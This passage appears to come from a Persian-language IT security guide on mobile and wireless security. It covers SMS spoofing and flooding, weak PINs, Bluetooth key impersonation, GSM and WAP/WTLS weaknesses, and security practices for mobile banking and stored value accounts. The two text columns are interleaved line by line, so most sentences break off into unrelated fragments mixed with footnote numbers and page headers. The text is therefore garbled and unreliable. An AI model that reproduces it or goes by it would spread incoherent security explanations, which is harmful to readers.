ﺩﺭ ﺣﺎﻓﻈﺔ ﻳﻚ ﺩﺳـﺘﮕﺎﻩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﺎ ﺩﻳـﺴﻚ ﺳـﺨﺖ ﻧﻴـﺰ ﻣﺸﻜﻼﺕ SMSﺗﺄﺧﻴﺮ ﺩﺭ ﺭﺳﻴﺪﻥ ﭘﻴﺎﻡ ﺑـﻪ ﻣﻘـﺼﺪ ﻣـﻲﺑﺎﺷـﺪ.
ﺫﺧﻴﺮﻩ ﻧﻤﻮﺩ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﮕﺎﻩ ﺗﺄﻣﻴﻦ ﻧﺒﺎﺷـﺪ ﺗﺮﺍﻛﻨﺸﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﺯﻣﺎﻧﻲ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻣـﺸﻜﻼﺕ ﻋﺪﻳـﺪﻩﺍﻱ ﺑـﻪ ﺑـﺎﺭ ﺑﻴﺎﻳﻨـﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑﻪ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻨﺪ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕـﺮ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ
ﺭﻣﺰﻫﺎﻱ ﻏﺎﻟﺐ PINﻫﺎ ﺍﻋﺪﺍﺩ ﭼﻬﺎﺭ ﺭﻗﻤﻲ ﻫـﺴﺘﻨﺪ ،ﻭ ﺷـﺎﻳﺪ ﺩﺭ ﺭﺍﻳﮕﺎﻥ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣـﻲﺗـﻮﺍﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ SMS
ﻧﻴﻤﻲ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﻋﺪﺩ 0000ﺑﺎﺷﺪ. ﺟﻌﻠﻲ ﺳﺎﺧﺖ ،ﺑﻪ ﮔﻮﺷﻲﻫﺎ ﻭ ﻣﺮﺍﻛﺰ SMSﺳـﻴﻠﻲ ﺍﺯ ﺑﻤﺒﻬـﺎﻱ
ﺍﻣﻨﻴــﺖ bluetoothﺩﺭ ﮔــﺮﻭ ﻧﮕﻬــﺪﺍﺭﻱ ﺍﺯ ﻛﻠﻴــﺪ ﺭﻣﺰﻧﮕــﺎﺭﻱ SMSﻓﺮﺳﺘﺎﺩ ،ﻭ ﻳﺎ ﺑﺴﺘﻪﻫﺎﻱ SMSﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﻛﺮﺩ
ﺑﺼﻮﺭﺕ ﻳﻚ ﺭﺍﺯ ﻣﺸﺘﺮﻙ ﻣﻴﺎﻥ ﺍﻋﻀﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺖ .ﺍﻣﺎ ﺗـﺼﻮﺭ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺧﺮﺍﺑﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﮔﻮﺷﻲﻫﺎ ﺷﻮﻧﺪ.
ﻛﻨﻴــﺪ ﻣــﻦ ﻭ ﺷــﻤﺎ ﺑــﺎ ﺗﻠﻔﻨﻬــﺎﻱ ﻫﻤــﺮﺍﻩ ﺧــﻮﺩ ﻛــﻪ ﻗﺎﺑﻠﻴــﺖ
bluetoothﺩﺍﺭﻧﺪ ﺩﺭﺣـﺎﻝ ﻣﻜﺎﻟﻤـﻪ ﻫـﺴﺘﻴﻢ .ﺑـﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﻓﻨﺎﻭﺭﻱ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ١٦٦(STK) SIMﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺮﺍﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ
ﺍﻣﻨﻴﺖ ﻣﻜﺎﻟﻤﻪ ،ﻣﻦ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺷﻤﺎ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻜﺎﻟﻤـﻪ ﺭﺍ SMSﺑﻜﺎﺭ ﺭﻭﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ STKﻳﻚ ﺳﺎﺯ ﻭ ﻛﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻻﻳـﺔ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﻛﻨﻢ .ﻛﻤﻲ ﺑﻌـﺪﺗﺮ ﻳﻜـﻲ ﺍﺯ ﺩﻭﺳـﺘﺎﻧﺘﺎﻥ ﺑـﺎ ﺷـﻤﺎ ﺍﻧﺘﻘﺎﻝ ١٦٧ﺍﺳﺖ ،ﻭ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺤﺮﻣﺎﻧﮕﻲ ﭘﺎﻳﺎﻧـﻪ ﺑـﻪ ﭘﺎﻳﺎﻧـﻪ ١٦٨ﺭﺍ
ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﺩ ﻭ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺍﺯ ﻛﻠﻴﺪ ﺧﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ. ﺗﻀﻤﻴﻦ ﻛﻨﺪ .ﻳﻚ ﺭﻭﺍﻝ ﺩﻳﮕﺮ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴـﺖ SMSﻣـﻲﺗﻮﺍﻧـﺪ
ﻣﻦ ﻛﻪ ﻛﻠﻴﺪ ﺷﻤﺎ ﺭﺍ ﻣﻲﺩﺍﻧﻢ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺁﺩﺭﺱ ﺟﻌﻠـﻲ
165 Short Message Service
166 SIM Toolkit Technology
167 Transport Layer
169 General Packet Radio Service 168 End-to-End Confidentiality
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٩٢
ﻳﻚ ﺷﺒﻜﻪ ﺳﻴﻤﻲ ﻣﻲﺷﻮﻧﺪ ﺗﺎ ﺑـﻪ ﺳـﻤﺖ ﻣﻘـﺼﺪ ﻧﻬـﺎﻳﻲ ﺧـﻮﺩ ﻣﻲﺗﻮﺍﻧﻢ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻢ ،ﻭ ﺑﻪ ﻣﻜﺎﻟﻤـﺔ ﺷـﻤﺎ
ﻫــﺪﺍﻳﺖ ﮔﺮﺩﻧــﺪ .ﺩﺭ ﺁﻥ ،gatewayﭘﻴــﺎﻡ WTLSﺑــﻪ SSL ﮔﻮﺵ ﻛﻨﻢ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻢ ﺧﻮﺩﻡ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺷﻤﺎ ﻳﺎ ﻛـﺴﻲ
ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ .ﺩﺭ gatewayﭘﻴﺎﻡ ﺑﺮﺍﻱ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﻣﻜﺎﻟﻤﻪ ﺑﺎ ﺷﻤﺎ ﺍﺳﺖ ﺟﺎ ﺑﺰﻧﻢ .ﺑﻨﺎﺑﺮﺍﻳﻦ bluetooth
ﻣﻲﮔﺮﺩﺩ ﻭ ﻫﻤﻴﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﻛﻞ ﺍﺭﺗﺒﺎﻁ ﻧـﺴﺒﺖ ﺑـﻪ ﺗﻨﻬﺎ ﺍﺑﺰﺍﺭﻫﺎ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ ،ﻧﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ.
ﻱ ﭘﻴﺎﻡ ﺁﺳﻴﺐﭘﺬﻳﺮ ﮔﺮﺩﺩ.
ﺩﺯﺩ ﹺ
ﺿﻌﻔﻬﺎﻱ WAP
ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ GSM ﻩ. ﻧﻘﻄﻪﺿﻌﻒ ﻣﺸﺘﺮﻙ ﺗﻤﺎﻡ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﺮﺭﺳﻲ ﺷﺪﻩ -ﺻـﺮﻓﻨﻈﺮ ﺍﺯ
١٧٠
ﻧﻮﻉ ﺷﺒﻜﻪ -ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﭘﺮﻭﺗﻜـﻞ ﻛـﺎﺭﺑﺮﺩ ﺑـﻲﺳـﻴﻢ )(WAP
ﻧﻘــﺎﻳﺺ ﺫﺍﺗــﻲ GSMﺑﺮﺍﺣﺘــﻲ ﻗﺎﺑــﻞ ﺭﻓــﻊ ﻧﻴــﺴﺘﻨﺪ .ﺗﻠﻔﻨﻬــﺎ ﻭ
ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺯﺑـﺎﻥ ﻋﻼﻣﺘﮕـﺬﺍﺭﻱ ﺑـﻲﺳـﻴﻢ ) ١٧١(WMLﻭ ﺯﺑـﺎﻥ
PDAﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻓﻨﺎﻭﺭﻱ GSMﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻋﻤﻮﻣﹰﺎ ﻗﺎﺩﺭ
ﻋﻼﻣﺘﮕﺬﺍﺭﻱ ﻭﺳﺎﻳﻞ ﺩﺳﺘﻲ ) ١٧٢(HDMLﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺍﺳـﺖ.
ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺤﺎﻓﻆ ﻧﻤﻲﺑﺎﺷـﻨﺪ .ﺍﮔﺮﭼـﻪ GSM
ﺗﻮﺳﻌﻪ ﺩﻫﻨﺪﮔﺎﻥ ﺑﺮﺍﻱ ﺭﺍﺣﺖﺗﺮ ﺷﺪﻥ ﻛﺎﺭ ،ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﺗـﻼﺵ
ﻣﺜﻞ ﻫﻤﺘﺎﻱ ﺁﻣﺮﻳﻜﺎﻳﻲ ﺧﻮﺩ -ﺍﺳﺘﺎﻧﺪﺍﺭﺩ - 802.11ﻧﺴﺒﺖ ﺑﻪ
ﻣﻲﻛﻨﻨﺪ ﻃﺮﺍﺣﻲ ﺳﻨﺎﺭﻳﻮﻫﺎ ﺑﮕﻮﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﻫﻨﮕـﺎﻡ
war drivingﺁﺳﻴﺐﭘﺬﻳﺮ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﭼﻨﺪ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳـﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﻣﻠـﺰﻡ ﺑـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩﻥ ﻛﻮﺗـﺎﻫﺘﺮﻳﻦ
ﺩﺍﺭﺩ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩ 802.11ﻣﺮﺑﻮﻁ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺖ ﻭ ﻧﻪ ﻭﺳـﺎﻳﻞ
ﻼ ﺍﻋﺪﺍﺩﻱ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﺷـﻤﺎﺭﻩ ﻛـﺎﺭﺕ ﻭﺭﻭﺩﻱ ﻣﻤﻜﻦ ﺑﺎﺷﺪ -ﻣﺜ ﹰ
ﮔﻮﺷﻲﺩﺍﺭ ،ﻭ ﻟﺬﺍ ﺍﻣﻨﻴﺖ ﺩﺭ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻃﺮﺯ ﻣـﺆﺛﺮﻱ ﻧـﺴﺒﺖ
ﺍﻋﺘﺒﺎﺭﻱ ﻳﺎ ﺷﻤﺎﺭﺓ ﺣﺴﺎﺏ ﺷﺨﺼﻲ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﺑﻪ
ﺑﻪ GSMﺑﻬﺒﻮﺩ ﻳﺎﺑﺪ .ﺷﺒﻜﻪ ﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )VPNﻫـﺎ(
ﺁﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﻗـﺴﻤﺖ ﺍﻋﻈـﻢ ﺍﻳـﻦ ﺩﺍﺩﻩﻫـﺎ ﺩﺭﻭﻥ
ﻓﺼﻞ ﻣﺸﺘﺮﻙ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻳـﻦ ﺩﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻫـﺴﺘﻨﺪ ،ﻭ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺫﺧﻴﺮﻩ ﻣﻲﺷـﻮﻧﺪ ،ﻭ ﺩﺭ ﻭﺳـﻴﻠﺔ ﺩﺳـﺘﻲ ﻣﺮﺑﻮﻃـﻪ
ﻻ ﺑﻌﻨــﻮﺍﻥ ﺭﺍﻩﺣﻠــﻲ ﺑــﺮﺍﻱ ﺭﻓــﻊ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ VPNﻣﻌﻤــﻮ ﹰ
ﺗﻨﻬﺎ ﻳﻚ cookieﺣﺎﻭﻱ ﺭﻣﺰ ﻋﺒـﻮﺭ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ؛ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻌﻠﻲ 802.11ﻭ GSMﺑـﺸﻤﺎﺭ ﻣـﻲﺭﻭﺩ .ﺑـﺎ
ﺍﻭﻗﺎﺕ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻳﻲ ﻣﺜﺎﻝ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻳـﺎ ﺍﻧﺘﻘـﺎﻝ ﺳـﺮﻣﺎﻳﻪ
ﺍﻳﻨﺤﺎﻝ ﺩﺭ ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﻻﻳﺔ ﺧﺎﺹ ﺍﻧﺘﻈـﺎﺭ
ﺻﺮﻓﹰﺎ ﺑﻪ ﻳﻚ PINﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻭ ﮔﺎﻫﻲ ﺣﺘﻲ ﺍﺯ ﺁﻥ ﻫـﻢ ﺑـﻲﻧﻴـﺎﺯ
ﻣﻌﺠﺰﻩ ﺩﺍﺷﺖ .ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪﻫـﺎﻱ
ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺗﺒـﺎﺩﻻﺕ ﻣﻴـﺎﻥ ﺩﺳـﺘﮕﺎﻫﻬﺎ ﺩﺭ
ﺑﻲﺳﻴﻢ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﭘﺎﻳﺎﻥ ﻫﻤﻴﻦ ﺑﺨﺶ ﻛﺘﺎﺏ ﻭ ﻧﻴﺰ ﺑﺨـﺶ
ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺮ ﻋﻬﺪﺓ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﻳﮕﺮﻱ ﺑﻪ ﻧـﺎﻡ ﺍﻣﻨﻴـﺖ ﻻﻳـﺔ
ﭘﻨﺠﻢ )ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ( ﺑﻴﺎﺑﻴﺪ.
ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳﻴﻢ ) ١٧٣(WTLSﻣﻲﺑﺎﺷﺪ.
ﺗﺠﺎﺭﺏ ﺍﻣﻨﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ. ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﻛﻪ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ۱۲۸ ١٧٤SSLﺑﻴﺘـﻲ ﻣﻮﺑﺎﻳـﻞ ﻳـﺎ
ﭘﺮﻭﺗﻜﻞ ) IPSecﻛﻪ ﺑﻴﺸﺘﺮ ﮔﻮﺷﻲﻫﺎ ﺑﺪﻟﻴﻞ ﻛﻤﺒﻮﺩ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻭ ﻗﺪﺭﺕ
ﺩﺭ ﻧﺘﻴﺠﺔ ﮔﺴﺘﺮﺵ ﻓﺮﺍﻭﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ GSMﺩﺭ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﭘﺮﺩﺍﺯﺵ ﺍﺯ ﺁﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﻤﻲﻛﻨﻨﺪ( ﺍﺳﺘﻔﺎﺩﻩ ﻧﺸﻮﺩ ،ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻗﺴﻤﺘﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻛﻨﺘﺮﻟـﻲ ﻭ ﺍﻣﻨﻴﺘـﻲ ﭼﻨـﺪﻱ ﺑﻮﺟـﻮﺩ
ﺍﺯ ﺷﺒﻜﻪ ﻳﻚ ﺣﻠﻘﺔ ﺿﻌﻴﻒ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ
ﺁﻣﺪﻩﺍﻧﺪ ﻛﻪ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺩﺭﺻـﻮﺭﺕ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ .ﺣﺘـﻲ ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﻧﻴـﺰ ﺿـﻌﻔﻬﺎﻱ
ﺑﻲﺳﻴﻢ ﺩﺭ ﺧﺪﻣﺎﺕ ﭘﺮﺩﺍﺧﺖ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺩﺍﺧﻞ ﻭﺳﻴﻠﻪ )ﻭ ﻧـﻪ ﻛﺎﻧـﺎﻝ ﺍﺭﺗﺒـﺎﻃﻲ( ﻫﻤﭽﻨـﺎﻥ ﻭﺟـﻮﺩ
ﭘﺮﺩﺍﺧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺷﺨﺺ ﺛﺎﻟﺚ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؛ ﻭ ﻟﺬﺍ ﺍﻣﻨﻴﺖ ﺍﺭﺗﺒﺎﻁ ﺑﻪ ﺳـﺎﺩﮔﻲ ﺧﺪﺷـﻪﺩﺍﺭ ﻣـﻲ-
ﺷﻮﺩ GSM .ﺍﺯ WAPﻭ WTLSﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻣﻌﺎﺩﻝ
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻗﺎﻋﺪﺓ ﻛﻠﻲ ،ﺑﺎﻧﻜﻬﺎ ﺑﺎﻳﺪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﻣﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺭﺍ SSLﺍﺳﺖ ﺍﻣﺎ ﺑﺎ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺿـﻌﻴﻔﺘﺮWTLS .
ﺩﺭ ﻣﻌﺎﻣﻼﺕ ﻣﺎﻟﻲ ﺑﻲﺳﻴﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻨﺪ .ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺎ SSLﻛﻪ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺻﻨﻌﺘﻲ ﺍﺳـﺖ ﺳـﺎﺯﮔﺎﺭ ﻧﻤـﻲﺑﺎﺷـﺪ.
ﺑﻌﻀﻲ ﺍﺯ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻪ ﺑﺎﻧﻚ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺋﻤﻲ ﺑﺪﻫﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺍﺯ ﭘﻴﺎﻣﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭﻭﻥ ﻳﻚ gatewayﻣﻲﺭﻭﻧﺪ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﻭﺍﺭﺩ
ﺣﺴﺎﺏ ﺁﻧﻬﺎ ﺍﻋﺘﺒﺎﺭ ﺑﺮﺩﺍﺷﺖ ﻛﻨﺪ ﻭ ﺑﻪ ﺣـﺴﺎﺏ ﺑﺮﺧـﻲ ﺍﺷـﺨﺎﺹ
ﺛﺎﻟــﺚ ﻭﺍﺭﻳــﺰ ﻧﻤﺎﻳــﺪ .ﭼﻨــﻴﻦ ﺗﻮﺍﻓﻘﻬــﺎﻳﻲ ﻣــﻲﺗﻮﺍﻧــﺪ ﺍﺯ ﻃﺮﻳــﻖ
ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﺣﺴﺎﺑﺮﺳﻲ ﻣـﺴﺘﻘﻴﻢ ١٧٥ﺻـﻮﺭﺕ 170
171
Wireless Application Protocol
Wireless Markup Language
172 Handled Device Markup Language
173 Wireless Transport Layer Security
175 Direct Debit Authorization Agreements 174 Secure Socket Layer
١٩٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﻪ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺗﻮﺻﻴﻪ ﺷﻮﺩ ﻛﻪ ﺑﺮﺍﻱ ﺧـﺪﻣﺎﺕ ﻣﺨﺘﻠـﻒ • ﺑﮕﻴﺮﺩ .ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﺩﺭﺻـﻮﺭﺕ ﻋﻤـﻞ ﺑـﻪ ﺍﻳـﻦ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﻪﻫـﺎ،
ﺍﺯ PINﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ. ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻣﺸﺘﺮﻳﺎﻥ )IDﻫـﺎ
ﻭ PINﻫﺎ( ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻳﺎ ﺁﻧﻬﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﻨﺪ.
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﭘﺮﺩﺍﺧـﺖ •
ﺳﻴﺎﺭ ﺑﺎﻳﺪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ
ﺣﺴﺎﺑﻬﺎﻱ ﺫﺧﻴﺮﻩ
ﺳﻴﺎﺭ ﺑﻪ ﻣﺸﺘﺮﻱ ﺩﺍﺩﻩ ﺷﻮﺩ.
ﺣﺴﺎﺑﻬﺎﻱ ﺫﺧﻴﺮﻩ ) ١٧٦(SVAﺗﻮﺳﻂ ﻣﺸﺘﺮﻳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷـﻮﺩ
ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺩﺭ ﻣﻮﺭﺩ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻣﺸﺎﺟﺮﺍﺕ ،ﺭﻭﺍﻟﻬـﺎﻱ •
ﻛﻪ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩ ﺍﻱ ﺑﻪ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎ ﭘﻮﻝ ﻭﺍﺭﻳﺰ ﻣﻲﻛﻨﻨﺪSVA .
ﮔﺰﺍﺭﺵﺩﻫﻲ ﻭ ﺯﻣﺎﻥ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺭﻓﻊ ﻭ ﺭﺟﻮﻉ ﺷـﻜﺎﻳﺎﺕ
ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺳـﻴﺎﺭ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ .ﻫﻨﮕـﺎﻡ ﺍﻧﺠـﺎﻡ
ﺑﺎﻳﺪ ﺑﻪ ﻣﺸﺘﺮﻱ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ.
ﻋﻤﻠﻴﺎﺕ ﭘﺮﺩﺍﺧﺖ ،ﻫﻴﭻ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻧﺒﺎﻳﺪ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ
ﻧﮕﺎﻩ ﺑﻪ ﺁﻳﻨﺪﻩ :ﻓﻨﺎﻭﺭﻱ ﻧﺴﻞ ﺳﻮﻡ ﮔﻴﺮﺩ .ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻋﺘﺒﺎﺭ ﺍﺯ ﻳﻚ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑﻪ ﻳﻚ ﺣـﺴﺎﺏ
SVAﺣﺘﻤﹰﺎ ﺻﺎﺣﺐ ﺁﻥ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑﺎﻳﺪ ﺷﺨـﺼﹰﺎ ﺑـﻪ ﺍﻳﻨﻜـﺎﺭ
ﻧﺴﻞ ﺳﻮﻡ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺑﻪ ﺍﺧﺘﺼﺎﺭ 3Gﺧﻮﺍﻧﺪﻩ ﻣـﻲﺷـﻮﺩ ﻭ ﺍﻗﺪﺍﻡ ﻛﻨﺪ.
ﺑﻪ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲ ﺳـﻴﻢ ﺩﺭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﺨﺘﻠـﻒ
